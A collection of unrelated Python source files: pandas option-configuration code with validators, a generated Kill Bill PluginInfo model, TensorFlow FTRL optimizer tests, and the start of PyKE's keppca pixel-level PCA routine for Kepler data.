raise OptionError("You can only set the value of existing options")
def __getattr__(self, key):
prefix = object.__getattribute__(self, "prefix")
if prefix:
prefix += "."
prefix += key
try:
v = object.__getattribute__(self, "d")[key]
except KeyError:
raise OptionError("No such option")
if isinstance(v, dict):
return DictWrapper(v, prefix)
else:
return _get_option(prefix)
def __dir__(self):
return list(self.d.keys())
# For user convenience, we'd like to have the available options described
# in the docstring. For dev convenience we'd like to generate the docstrings
# dynamically instead of maintaining them by hand. To this end, we use the
# class below which wraps functions inside a callable, and converts
# __doc__ into a property function. The docstrings below are templates
# using the py2.6+ advanced formatting syntax to plug in a concise list
# of options, and option descriptions.
class CallableDynamicDoc(object):
def __init__(self, func, doc_tmpl):
self.__doc_tmpl__ = doc_tmpl
self.__func__ = func
def __call__(self, *args, **kwds):
return self.__func__(*args, **kwds)
@property
def __doc__(self):
opts_desc = _describe_option('all', _print_desc=False)
opts_list = pp_options_list(list(_registered_options.keys()))
return self.__doc_tmpl__.format(opts_desc=opts_desc,
opts_list=opts_list)
_get_option_tmpl = """
get_option(pat)
Retrieves the value of the specified option.
Available options:
{opts_list}
Parameters
----------
pat : str
Regexp which should match a single option.
Note: partial matches are supported for convenience, but unless you use the
full option name (e.g. x.y.z.option_name), your code may break in future
versions if new options with similar names are introduced.
Returns
-------
result : the value of the option
Raises
------
OptionError : if no such option exists
Notes
-----
The available options with their descriptions:
{opts_desc}
"""
_set_option_tmpl = """
set_option(pat, value)
Sets the value of the specified option.
Available options:
{opts_list}
Parameters
----------
pat : str
Regexp which should match a single option.
Note: partial matches are supported for convenience, but unless you use the
full option name (e.g. x.y.z.option_name), your code may break in future
versions if new options with similar names are introduced.
value :
new value of option.
Returns
-------
None
Raises
------
OptionError if no such option exists
Notes
-----
The available options with their descriptions:
{opts_desc}
"""
_describe_option_tmpl = """
describe_option(pat, _print_desc=False)
Prints the description for one or more registered options.
Call with no arguments to get a listing for all registered options.
Available options:
{opts_list}
Parameters
----------
pat : str
Regexp pattern. All matching keys will have their description displayed.
_print_desc : bool, default True
If True (default) the description(s) will be printed to stdout.
Otherwise, the description(s) will be returned as a unicode string
(for testing).
Returns
-------
None by default, the description(s) as a unicode string if _print_desc
is False
Notes
-----
The available options with their descriptions:
{opts_desc}
"""
_reset_option_tmpl = """
reset_option(pat)
Reset one or more options to their default value.
Pass "all" as argument to reset all options.
Available options:
{opts_list}
Parameters
----------
pat : str/regex
If specified only options matching `prefix*` will be reset.
Note: partial matches are supported for convenience, but unless you
use the full option name (e.g. x.y.z.option_name), your code may break
in future versions if new options with similar names are introduced.
Returns
-------
None
Notes
-----
The available options with their descriptions:
{opts_desc}
"""
# bind the functions with their docstrings into a Callable
# and use that as the functions exposed in pd.api
get_option = CallableDynamicDoc(_get_option, _get_option_tmpl)
set_option = CallableDynamicDoc(_set_option, _set_option_tmpl)
reset_option = CallableDynamicDoc(_reset_option, _reset_option_tmpl)
describe_option = CallableDynamicDoc(_describe_option, _describe_option_tmpl)
options = DictWrapper(_global_config)
#
# Functions for use by pandas developers, in addition to User - api
class option_context(object):
"""
Context manager to temporarily set options in the `with` statement context.
You need to invoke as ``option_context(pat, val, [(pat, val), ...])``.
Examples
--------
>>> with option_context('display.max_rows', 10, 'display.max_columns', 5):
... ...
"""
def __init__(self, *args):
if not (len(args) % 2 == 0 and len(args) >= 2):
raise ValueError('Need to invoke as'
' option_context(pat, val, [(pat, val), ...]).')
self.ops = list(zip(args[::2], args[1::2]))
def __enter__(self):
undo = []
for pat, val in self.ops:
undo.append((pat, _get_option(pat, silent=True)))
self.undo = undo
for pat, val in self.ops:
_set_option(pat, val, silent=True)
def __exit__(self, *args):
if self.undo:
for pat, val in self.undo:
_set_option(pat, val, silent=True)
def register_option(key, defval, doc='', validator=None, cb=None):
"""Register an option in the package-wide pandas config object
Parameters
----------
key - a fully-qualified key, e.g. "x.y.option - z".
defval - the default value of the option
doc - a string description of the option
validator - a function of a single argument, should raise `ValueError` if
called with a value which is not a legal value for the option.
cb - a function of a single argument "key", which is called
immediately after an option value is set/reset. key is
the full name of the option.
Returns
-------
Nothing.
Raises
------
ValueError if `validator` is specified and `defval` is not a valid value.
"""
import tokenize
import keyword
key = key.lower()
if key in _registered_options:
msg = "Option '{key}' has already been registered"
raise OptionError(msg.format(key=key))
if key in _reserved_keys:
msg = "Option '{key}' is a reserved key"
raise OptionError(msg.format(key=key))
# the default value should be legal
if validator:
validator(defval)
# walk the nested dict, creating dicts as needed along the path
path = key.split('.')
for k in path:
if not bool(re.match('^' + tokenize.Name + '$', k)):
raise ValueError("{k} is not a valid identifier".format(k=k))
if keyword.iskeyword(k):
raise ValueError("{k} is a python keyword".format(k=k))
cursor = _global_config
msg = "Path prefix to option '{option}' is already an option"
for i, p in enumerate(path[:-1]):
if not isinstance(cursor, dict):
raise OptionError(msg.format(option='.'.join(path[:i])))
if p not in cursor:
cursor[p] = {}
cursor = cursor[p]
if not isinstance(cursor, dict):
raise OptionError(msg.format(option='.'.join(path[:-1])))
cursor[path[-1]] = defval # initialize
# save the option metadata
_registered_options[key] = RegisteredOption(key=key, defval=defval,
doc=doc, validator=validator,
cb=cb)
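# Illustrative registration with a validator and a callback (assumed option name;
# not part of the original module):
#
#   def _positive_int(value):
#       if not isinstance(value, int) or value <= 0:
#           raise ValueError("must be a positive integer")
#
#   register_option("compute.demo_threads", 4, "number of worker threads",
#                   validator=_positive_int,
#                   cb=lambda key: print("option changed:", key))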
def deprecate_option(key, msg=None, rkey=None, removal_ver=None):
"""
Mark option `key` as deprecated, if code attempts to access this option,
a warning will be produced, using `msg` if given, or a default message
if not.
if `rkey` is given, any access to the key will be re-routed to `rkey`.
Neither the existence of `key` nor that of `rkey` is checked. If they
do not exist, any subsequent access will fail as usual, after the
deprecation warning is given.
Parameters
----------
key - the name of the option to be deprecated. must be a fully-qualified
option name (e.g "x.y.z.rkey").
msg - (Optional) a warning message to output when the key is referenced.
if no message is given a default message will be emitted.
rkey - (Optional) the name of an option to reroute access to.
If specified, any referenced `key` will be re-routed to `rkey`
including set/get/reset.
rkey must be a fully-qualified option name (e.g "x.y.z.rkey").
used by the default message if no `msg` is specified.
removal_ver - (Optional) specifies the version in which this option will
be removed. used by the default message if no `msg`
is specified.
Returns
-------
Nothing
Raises
------
OptionError - if key has already been deprecated.
"""
key = key.lower()
if key in _deprecated_options:
msg = "Option '{key}' has already been defined as deprecated."
raise OptionError(msg.format(key=key))
_deprecated_options[key] = DeprecatedOption(key, msg, rkey, removal_ver)
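# Hedged sketch (not in the original source) of pairing deprecate_option with
# register_option: accessing the deprecated key emits a FutureWarning and, when
# `rkey` is given, is rerouted to the replacement key. Both keys below are
# hypothetical.
def _example_deprecate_option():  # pragma: no cover
    register_option("display.new_width", 80, validator=is_int)
    deprecate_option("display.old_width", rkey="display.new_width",
                     removal_ver="2.0")
    # Reads and writes on the old key now warn and operate on the new key.
    set_option("display.old_width", 100)
    assert get_option("display.new_width") == 100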
#
# functions internal to the module
def _select_options(pat):
"""returns a list of keys matching `pat`
if pat=="all", returns all registered options
"""
# short-circuit for exact key
if pat in _registered_options:
return [pat]
# else look through all of them
keys = sorted(_registered_options.keys())
if pat == 'all': # reserved key
return keys
return [k for k in keys if re.search(pat, k, re.I)]
def _get_root(key):
path = key.split('.')
cursor = _global_config
for p in path[:-1]:
cursor = cursor[p]
return cursor, path[-1]
def _is_deprecated(key):
""" Returns True if the given option has been deprecated """
key = key.lower()
return key in _deprecated_options
def _get_deprecated_option(key):
"""
Retrieves the metadata for a deprecated option, if `key` is deprecated.
Returns
-------
DeprecatedOption (namedtuple) if key is deprecated, None otherwise
"""
try:
d = _deprecated_options[key]
except KeyError:
return None
else:
return d
def _get_registered_option(key):
"""
Retrieves the option metadata if `key` is a registered option.
Returns
-------
RegisteredOption (namedtuple) if key is a registered option, None otherwise
"""
return _registered_options.get(key)
def _translate_key(key):
"""
if key is deprecated and a replacement key is defined, will return the
replacement key, otherwise returns `key` as-is
"""
d = _get_deprecated_option(key)
if d:
return d.rkey or key
else:
return key
def _warn_if_deprecated(key):
"""
Checks if `key` is a deprecated option and if so, prints a warning.
Returns
-------
bool - True if `key` is deprecated, False otherwise.
"""
d = _get_deprecated_option(key)
if d:
if d.msg:
print(d.msg)
warnings.warn(d.msg, FutureWarning)
else:
msg = "'{key}' is deprecated".format(key=key)
if d.removal_ver:
msg += (' and will be removed in {version}'
.format(version=d.removal_ver))
if d.rkey:
msg += ", please use '{rkey}' instead.".format(rkey=d.rkey)
else:
msg += ', please refrain from using it.'
warnings.warn(msg, FutureWarning)
return True
return False
def _build_option_description(k):
""" Builds a formatted description of a registered option and prints it """
o = _get_registered_option(k)
d = _get_deprecated_option(k)
s = u('{k} ').format(k=k)
if o.doc:
s += '\n'.join(o.doc.strip().split('\n'))
else:
s += 'No description available.'
if o:
s += (u('\n [default: {default}] [currently: {current}]')
.format(default=o.defval, current=_get_option(k, True)))
if d:
s += u('\n (Deprecated')
s += (u(', use `{rkey}` instead.')
.format(rkey=d.rkey if d.rkey else ''))
s += u(')')
s += '\n\n'
return s
def pp_options_list(keys, width=80, _print=False):
""" Builds a concise listing of available options, grouped by prefix """
from textwrap import wrap
from itertools import groupby
def pp(name, ks):
pfx = ('- ' + name + '.[' if name else '')
ls = wrap(', '.join(ks), width, initial_indent=pfx,
subsequent_indent=' ', break_long_words=False)
if ls and ls[-1] and name:
ls[-1] = ls[-1] + ']'
return ls
ls = []
singles = [x for x in sorted(keys) if x.find('.') < 0]
if singles:
ls += pp('', singles)
keys = [x for x in keys if x.find('.') >= 0]
for k, g in groupby(sorted(keys), lambda x: x[:x.rfind('.')]):
ks = [x[len(k) + 1:] for x in list(g)]
ls += pp(k, ks)
s = '\n'.join(ls)
if _print:
print(s)
else:
return s
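# Illustrative sketch (not part of the original module): pp_options_list groups
# dotted keys by their common prefix, so the hypothetical call below yields
# lines such as "- display.[max_rows, width]" and "- mode.[sim_interactive]".
def _example_pp_options_list():  # pragma: no cover
    return pp_options_list(
        ["display.width", "display.max_rows", "mode.sim_interactive"])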
#
# helpers
@contextmanager
def config_prefix(prefix):
"""contextmanager for multiple invocations of API with a common prefix
supported API functions: (register / get / set)_option
Warning: This is not thread-safe, and won't work properly if you import
the API functions into your module using the "from x import y" construct.
Example:
import pandas.core.config as cf
with cf.config_prefix("display.font"):
cf.register_option("color", "red")
cf.register_option("size", " 5 pt")
cf.set_option("size", " 6 pt")
cf.get_option("size")
...
etc.
will register options "display.font.color", "display.font.size", set the
value of "display.font.size"... and so on.
"""
# Note: reset_option relies on set_option, and on key directly;
# it does not fit into this monkey-patching scheme
global register_option, get_option, set_option, reset_option
def wrap(func):
def inner(key, *args, **kwds):
pkey = '{prefix}.{key}'.format(prefix=prefix, key=key)
return func(pkey, *args, **kwds)
return inner
_register_option = register_option
_get_option = get_option
_set_option = set_option
set_option = wrap(set_option)
get_option = wrap(get_option)
register_option = wrap(register_option)
yield None
set_option = _set_option
get_option = _get_option
register_option = _register_option
# These factories and methods are handy for use as the validator
# arg in register_option
def is_type_factory(_type):
"""
Parameters
----------
`_type` - a type to be compared against (e.g. type(x) == `_type`)
Returns
-------
validator - a function of a single argument x , which raises
ValueError if type(x) is not equal to `_type`
"""
def inner(x):
if type(x) != _type:
msg = "Value must have type '{typ!s}'"
raise ValueError(msg.format(typ=_type))
return inner
def is_instance_factory(_type):
"""
Parameters
----------
`_type` - the type to be checked against
Returns
-------
validator - a function of a single argument x , which raises
ValueError if x is not an instance of `_type`
"""
if isinstance(_type, (tuple, list)):
_type = tuple(_type)
from pandas.io.formats.printing import pprint_thing
type_repr = "|".join(map(pprint_thing, _type))
else:
type_repr = "'{typ}'".format(typ=_type)
def inner(x):
if not isinstance(x, _type):
msg = "Value must be an instance of {type_repr}"
raise ValueError(msg.format(type_repr=type_repr))
return inner
def is_one_of_factory(legal_values):
callables = [c for c in legal_values if callable(c)]
legal_values = [c for c in legal_values if not callable(c)]
def inner(x):
from pandas.io.formats.printing import pprint_thing as pp
if x not in legal_values:
if not any(c(x) for c in callables):
pp_values = pp("|".join(lmap(pp, legal_values)))
msg = "Value must be one of {pp_values}"
if len(callables):
msg += " or a callable"
raise ValueError(msg.format(pp_values=pp_values))
return inner
# common type validators, for convenience
# usage: register_option(... , validator = is_int)
is_int = is_type_factory(int)
is_bool = is_type_factory(bool)
is_float = is_type_factory(float)
is_str = is_type_factory(str)
is_unicode = is_type_factory(compat.text_type)
is_text = is_instance_factory((str, bytes))
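# A small hypothetical sketch (not part of the original module) of composing
# these factories with register_option; the option name, the legal values and
# the exact error text are illustrative assumptions.
def _example_validators():  # pragma: no cover
    is_alignment = is_one_of_factory(["left", "right", "center"])
    register_option("display.example_align", "left",
                    doc="hypothetical alignment option",
                    validator=is_alignment)
    # set_option("display.example_align", "justify") would raise ValueError
    # with a message along the lines of
    # "Value must be one of left|right|center".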
def is_callable(obj):
"""
Parameters
----------
`obj` - the object to be checked
Returns
-------
validator - returns True if object is callable,
raises ValueError otherwise.
"""
if not callable(obj):
raise ValueError("Value must be a callable")
return True
|
|
# coding: utf-8
#
# Copyright 2010-2014 Ning, Inc.
# Copyright 2014-2020 Groupon, Inc
# Copyright 2020-2021 Equinix, Inc
# Copyright 2014-2021 The Billing Project, LLC
#
# The Billing Project, LLC licenses this file to you under the Apache License, version 2.0
# (the "License"); you may not use this file except in compliance with the
# License. You may obtain a copy of the License at:
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
"""
Kill Bill
Kill Bill is an open-source billing and payments platform # noqa: E501
OpenAPI spec version: 0.22.22-SNAPSHOT
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
class PluginInfo(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'bundle_symbolic_name': 'Str',
'plugin_key': 'Str',
'plugin_name': 'Str',
'version': 'Str',
'state': 'Str',
'is_selected_for_start': 'Bool',
'services': 'List[PluginServiceInfo]'
}
attribute_map = {
'bundle_symbolic_name': 'bundleSymbolicName',
'plugin_key': 'pluginKey',
'plugin_name': 'pluginName',
'version': 'version',
'state': 'state',
'is_selected_for_start': 'isSelectedForStart',
'services': 'services'
}
def __init__(self, bundle_symbolic_name=None, plugin_key=None, plugin_name=None, version=None, state=None, is_selected_for_start=None, services=None): # noqa: E501
"""PluginInfo - a model defined in Swagger""" # noqa: E501
self._bundle_symbolic_name = None
self._plugin_key = None
self._plugin_name = None
self._version = None
self._state = None
self._is_selected_for_start = None
self._services = None
self.discriminator = None
if bundle_symbolic_name is not None:
self.bundle_symbolic_name = bundle_symbolic_name
if plugin_key is not None:
self.plugin_key = plugin_key
if plugin_name is not None:
self.plugin_name = plugin_name
if version is not None:
self.version = version
if state is not None:
self.state = state
if is_selected_for_start is not None:
self.is_selected_for_start = is_selected_for_start
if services is not None:
self.services = services
@property
def bundle_symbolic_name(self):
"""Gets the bundle_symbolic_name of this PluginInfo. # noqa: E501
:return: The bundle_symbolic_name of this PluginInfo. # noqa: E501
:rtype: Str
"""
return self._bundle_symbolic_name
@bundle_symbolic_name.setter
def bundle_symbolic_name(self, bundle_symbolic_name):
"""Sets the bundle_symbolic_name of this PluginInfo.
:param bundle_symbolic_name: The bundle_symbolic_name of this PluginInfo. # noqa: E501
:type: Str
"""
self._bundle_symbolic_name = bundle_symbolic_name
@property
def plugin_key(self):
"""Gets the plugin_key of this PluginInfo. # noqa: E501
:return: The plugin_key of this PluginInfo. # noqa: E501
:rtype: Str
"""
return self._plugin_key
@plugin_key.setter
def plugin_key(self, plugin_key):
"""Sets the plugin_key of this PluginInfo.
:param plugin_key: The plugin_key of this PluginInfo. # noqa: E501
:type: Str
"""
self._plugin_key = plugin_key
@property
def plugin_name(self):
"""Gets the plugin_name of this PluginInfo. # noqa: E501
:return: The plugin_name of this PluginInfo. # noqa: E501
:rtype: Str
"""
return self._plugin_name
@plugin_name.setter
def plugin_name(self, plugin_name):
"""Sets the plugin_name of this PluginInfo.
:param plugin_name: The plugin_name of this PluginInfo. # noqa: E501
:type: Str
"""
self._plugin_name = plugin_name
@property
def version(self):
"""Gets the version of this PluginInfo. # noqa: E501
:return: The version of this PluginInfo. # noqa: E501
:rtype: Str
"""
return self._version
@version.setter
def version(self, version):
"""Sets the version of this PluginInfo.
:param version: The version of this PluginInfo. # noqa: E501
:type: Str
"""
self._version = version
@property
def state(self):
"""Gets the state of this PluginInfo. # noqa: E501
:return: The state of this PluginInfo. # noqa: E501
:rtype: Str
"""
return self._state
@state.setter
def state(self, state):
"""Sets the state of this PluginInfo.
:param state: The state of this PluginInfo. # noqa: E501
:type: Str
"""
self._state = state
@property
def is_selected_for_start(self):
"""Gets the is_selected_for_start of this PluginInfo. # noqa: E501
:return: The is_selected_for_start of this PluginInfo. # noqa: E501
:rtype: Bool
"""
return self._is_selected_for_start
@is_selected_for_start.setter
def is_selected_for_start(self, is_selected_for_start):
"""Sets the is_selected_for_start of this PluginInfo.
:param is_selected_for_start: The is_selected_for_start of this PluginInfo. # noqa: E501
:type: Bool
"""
self._is_selected_for_start = is_selected_for_start
@property
def services(self):
"""Gets the services of this PluginInfo. # noqa: E501
:return: The services of this PluginInfo. # noqa: E501
:rtype: List[PluginServiceInfo]
"""
return self._services
@services.setter
def services(self, services):
"""Sets the services of this PluginInfo.
:param services: The services of this PluginInfo. # noqa: E501
:type: List[PluginServiceInfo]
"""
self._services = services
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, PluginInfo):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
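# Hedged usage sketch (not produced by swagger-codegen): constructing a
# PluginInfo and serializing it with to_dict(). All field values below are
# illustrative assumptions.
def _example_plugin_info():  # pragma: no cover
    info = PluginInfo(bundle_symbolic_name="org.kill-bill.billing.plugin.example",
                      plugin_key="example", plugin_name="example-plugin",
                      version="1.0.0", state="RUNNING",
                      is_selected_for_start=True, services=[])
    return info.to_dict()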
|
|
# Copyright 2015 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Functional tests for Ftrl operations."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow.python.platform
import numpy as np
import tensorflow as tf
class FtrlOptimizerTest(tf.test.TestCase):
def testFtrlwithoutRegularization(self):
with self.test_session() as sess:
var0 = tf.Variable([0.0, 0.0])
var1 = tf.Variable([0.0, 0.0])
grads0 = tf.constant([0.1, 0.2])
grads1 = tf.constant([0.01, 0.02])
opt = tf.train.FtrlOptimizer(3.0,
initial_accumulator_value=0.1,
l1_regularization_strength=0.0,
l2_regularization_strength=0.0)
update = opt.apply_gradients(zip([grads0, grads1], [var0, var1]))
tf.initialize_all_variables().run()
v0_val, v1_val = sess.run([var0, var1])
self.assertAllClose([0.0, 0.0], v0_val)
self.assertAllClose([0.0, 0.0], v1_val)
# Run 3 steps FTRL
for _ in range(3):
update.run()
v0_val, v1_val = sess.run([var0, var1])
self.assertAllClose(np.array([-2.60260963, -4.29698515]),
v0_val)
self.assertAllClose(np.array([-0.28432083, -0.56694895]),
v1_val)
def testFtrlwithoutRegularization2(self):
with self.test_session() as sess:
var0 = tf.Variable([1.0, 2.0])
var1 = tf.Variable([4.0, 3.0])
grads0 = tf.constant([0.1, 0.2])
grads1 = tf.constant([0.01, 0.02])
opt = tf.train.FtrlOptimizer(3.0,
initial_accumulator_value=0.1,
l1_regularization_strength=0.0,
l2_regularization_strength=0.0)
update = opt.apply_gradients(zip([grads0, grads1], [var0, var1]))
tf.initialize_all_variables().run()
v0_val, v1_val = sess.run([var0, var1])
self.assertAllClose([1.0, 2.0], v0_val)
self.assertAllClose([4.0, 3.0], v1_val)
# Run 3 steps FTRL
for _ in range(3):
update.run()
v0_val, v1_val = sess.run([var0, var1])
self.assertAllClose(np.array([-2.55607247, -3.98729396]),
v0_val)
self.assertAllClose(np.array([-0.28232238, -0.56096673]),
v1_val)
def testFtrlWithL1(self):
with self.test_session() as sess:
var0 = tf.Variable([1.0, 2.0])
var1 = tf.Variable([4.0, 3.0])
grads0 = tf.constant([0.1, 0.2])
grads1 = tf.constant([0.01, 0.02])
opt = tf.train.FtrlOptimizer(3.0,
initial_accumulator_value=0.1,
l1_regularization_strength=0.001,
l2_regularization_strength=0.0)
update = opt.apply_gradients(zip([grads0, grads1], [var0, var1]))
tf.initialize_all_variables().run()
v0_val, v1_val = sess.run([var0, var1])
self.assertAllClose([1.0, 2.0], v0_val)
self.assertAllClose([4.0, 3.0], v1_val)
# Run 10 steps FTRL
for _ in range(10):
update.run()
v0_val, v1_val = sess.run([var0, var1])
self.assertAllClose(np.array([-7.66718769, -10.91273689]),
v0_val)
self.assertAllClose(np.array([-0.93460727, -1.86147261]),
v1_val)
def testFtrlWithL1_L2(self):
with self.test_session() as sess:
var0 = tf.Variable([1.0, 2.0])
var1 = tf.Variable([4.0, 3.0])
grads0 = tf.constant([0.1, 0.2])
grads1 = tf.constant([0.01, 0.02])
opt = tf.train.FtrlOptimizer(3.0,
initial_accumulator_value=0.1,
l1_regularization_strength=0.001,
l2_regularization_strength=2.0)
update = opt.apply_gradients(zip([grads0, grads1], [var0, var1]))
tf.initialize_all_variables().run()
v0_val, v1_val = sess.run([var0, var1])
self.assertAllClose([1.0, 2.0], v0_val)
self.assertAllClose([4.0, 3.0], v1_val)
# Run 10 steps FTRL
for _ in range(10):
update.run()
v0_val, v1_val = sess.run([var0, var1])
self.assertAllClose(np.array([-0.24059935, -0.46829352]),
v0_val)
self.assertAllClose(np.array([-0.02406147, -0.04830509]),
v1_val)
def applyOptimizer(self, opt, steps=5, is_sparse=False):
if is_sparse:
var0 = tf.Variable([[0.0], [0.0]])
var1 = tf.Variable([[0.0], [0.0]])
grads0 = tf.IndexedSlices(tf.constant([0.1], shape=[1, 1]),
tf.constant([0]),
tf.constant([2, 1]))
grads1 = tf.IndexedSlices(tf.constant([0.02], shape=[1, 1]),
tf.constant([1]),
tf.constant([2, 1]))
else:
var0 = tf.Variable([0.0, 0.0])
var1 = tf.Variable([0.0, 0.0])
grads0 = tf.constant([0.1, 0.2])
grads1 = tf.constant([0.01, 0.02])
update = opt.apply_gradients(zip([grads0, grads1], [var0, var1]))
tf.initialize_all_variables().run()
sess = tf.get_default_session()
v0_val, v1_val = sess.run([var0, var1])
if is_sparse:
self.assertAllClose([[0.0], [0.0]], v0_val)
self.assertAllClose([[0.0], [0.0]], v1_val)
else:
self.assertAllClose([0.0, 0.0], v0_val)
self.assertAllClose([0.0, 0.0], v1_val)
# Run Ftrl for a few steps
for _ in range(steps):
update.run()
v0_val, v1_val = sess.run([var0, var1])
return v0_val, v1_val
# When variables are initialized with zero, FTRL-Proximal has two properties:
# 1. Without L1 & L2 but with a fixed learning rate, FTRL-Proximal is
# identical to GradientDescent.
# 2. Without L1 & L2 but with an adaptive learning rate, FTRL-Proximal is
# identical to Adagrad.
# So, based on these two properties, we test whether our implementation of
# FTRL-Proximal performs the same updates as Adagrad or GradientDescent.
def testEquivAdagradwithoutRegularization(self):
with self.test_session():
val0, val1 = self.applyOptimizer(
tf.train.FtrlOptimizer(3.0,
# Adagrad learning rate
learning_rate_power=-0.5,
initial_accumulator_value=0.1,
l1_regularization_strength=0.0,
l2_regularization_strength=0.0))
with self.test_session():
val2, val3 = self.applyOptimizer(
tf.train.AdagradOptimizer(3.0, initial_accumulator_value=0.1))
self.assertAllClose(val0, val2)
self.assertAllClose(val1, val3)
def testEquivSparseAdagradwithoutRegularization(self):
with self.test_session():
val0, val1 = self.applyOptimizer(
tf.train.FtrlOptimizer(3.0,
# Adagrad learning rate
learning_rate_power=-0.5,
initial_accumulator_value=0.1,
l1_regularization_strength=0.0,
l2_regularization_strength=0.0),
is_sparse=True)
with self.test_session():
val2, val3 = self.applyOptimizer(
tf.train.AdagradOptimizer(3.0, initial_accumulator_value=0.1),
is_sparse=True)
self.assertAllClose(val0, val2)
self.assertAllClose(val1, val3)
def testEquivSparseGradientDescentwithoutRegularization(self):
with self.test_session():
val0, val1 = self.applyOptimizer(
tf.train.FtrlOptimizer(3.0,
# Fixed learning rate
learning_rate_power=-0.0,
initial_accumulator_value=0.1,
l1_regularization_strength=0.0,
l2_regularization_strength=0.0),
is_sparse=True)
with self.test_session():
val2, val3 = self.applyOptimizer(
tf.train.GradientDescentOptimizer(3.0), is_sparse=True)
self.assertAllClose(val0, val2)
self.assertAllClose(val1, val3)
def testEquivGradientDescentwithoutRegularization(self):
with self.test_session():
val0, val1 = self.applyOptimizer(
tf.train.FtrlOptimizer(3.0,
# Fixed learning rate
learning_rate_power=-0.0,
initial_accumulator_value=0.1,
l1_regularization_strength=0.0,
l2_regularization_strength=0.0))
with self.test_session():
val2, val3 = self.applyOptimizer(
tf.train.GradientDescentOptimizer(3.0))
self.assertAllClose(val0, val2)
self.assertAllClose(val1, val3)
if __name__ == "__main__":
tf.test.main()
|
|
from .utils import PyKEArgumentHelpFormatter
from . import kepmsg, kepio, kepkey, kepplot
import re
import numpy as np
from astropy.io import fits as pyfits
from scipy import optimize as opt
from matplotlib import pyplot as plt
from tqdm import tqdm
import random
__all__ = ['keppca']
def keppca(infile, outfile=None, maskfile='ALL', components='1-3', plotpca=False,
nmaps=10, overwrite=False, verbose=False, logfile='keppca.log'):
"""
keppca -- Perform principal component analysis upon a target pixel file
keppca provides a method to mitigate motion-derived systematic
artifacts via Principal Component Analysis (PCA). This method was
demonstrated on Kepler light curves by Harrison et al. (2012). It provides
an alternative to cotrending data using basis vectors (kepcotrend) and
correlating aperture photometry structure with time-series centroid
measurements (kepsff). PCA will perhaps become a more widespread tool in
the K2 era, where the magnitude of target motion across the detector over a
Kepler quarter is experienced by a K2 target over just 6 hours during its
regular sequence of thruster firings that counteract boresight roll motion.
Pixel-level PCA employs only those pixels collected around a specific
target and separates photometric trends common to all pixels from trends
localized to individual targets or pixels in a series of principal
component curves.
The user has the option to choose the specific set of pixels to sample in
this analysis. Principal components are plotted by the tool and written out
to an output FITS file in an output extension called PRINCIPAL_COMPONENTS.
The extension contains a 2D table with one row per timestamp recorded in
the input file and one column for every principal component. Summing all
principal components together will reconstruct a normalized version of the
summed pixel within the chosen aperture. The user also has the choice of
which principal components to optimally-subtract from the aperture-derived
light curve in order to remove motion systematics from the time-series
data. The aperture light curve and the corrected light curve are written to
the LIGHTCURVE extension of the output file. The first populates the
SAP_FLUX data column and the second is written to a column called PCA_FLUX.
This output file can be used as input for other PyKE tasks and can be e.g.
inspected using kepdraw.
Parameters
----------
infile : str
The name of a standard format FITS file containing Kepler or K2 target
pixels within the first data extension.
outfile : str
Filename for the output light curves and principal components. This
product will be written to the same FITS format as archived light
curves. Aperture photometry will be stored in the SAP_FLUX column of
the first FITS extension called LIGHTCURVE. A version of this light
curve with principal components subtracted is stored in column PCA_FLUX
and a normalized version is stored in PCA_FLUX_NRM. The individual
principal components are stored within a new FITS extension called
PRINCIPAL_COMPONENTS.
maskfile : str
This string can be one of three options:
* 'ALL' tells the task to calculate principal components from all
pixels within the pixel mask stored in the input file.
* 'APER' tells the task to calculate principal components from only the
pixels within the photometric aperture stored in the input file (e.g.
only those pixels summed by the Kepler pipeline to produce the light
curve archived at MAST; note that no such light curves are currently
being created for the K2 mission).
* A filename describing the desired photometric aperture. Such a file
can be constructed using the kepmask or kepffi tools, or can be created
manually using the format described in the documentation for those
tools. Note that if the aperture provided is not strictly rectangular,
keppca will increase the size of the aperture so that it defines the
smallest possible rectangle that contains all of the specified pixels.
components : str
A list of the principal components to subtract from the aperture light
curve. The strings '1 2 3 4 5', '1,2,3,4,5' and '1,2,3-5' yield the
same result.
plotpca : bool
If True, keppca will produce plots containing individual principal
components, correlation maps and light curves, both aperture and
PCA-corrected versions. They will be stored as hardcopies in PNG format.
nmaps : int
The number of correlation maps and principal components to plot as
output. This can be any positive integer up to the number of pixels
within the mask, although note that many hundreds of plots will likely
become prohibitive and are unlikely to be informative.
overwrite : bool
Overwrite the output file?
verbose : bool
Print informative messages and warnings to the shell and logfile?
logfile : str
Name of the logfile containing error and warning messages
Examples
--------
.. code-block:: bash
$ keppca ktwo202073445-c00_lpd-targ.fits.gz --plotpca
.. image:: ../_static/images/api/keppca.png
:align: center
"""
import mdp
if outfile is None:
outfile = infile.split('.')[0] + "-{}.fits".format(__all__[0])
# log the call
hashline = '--------------------------------------------------------------'
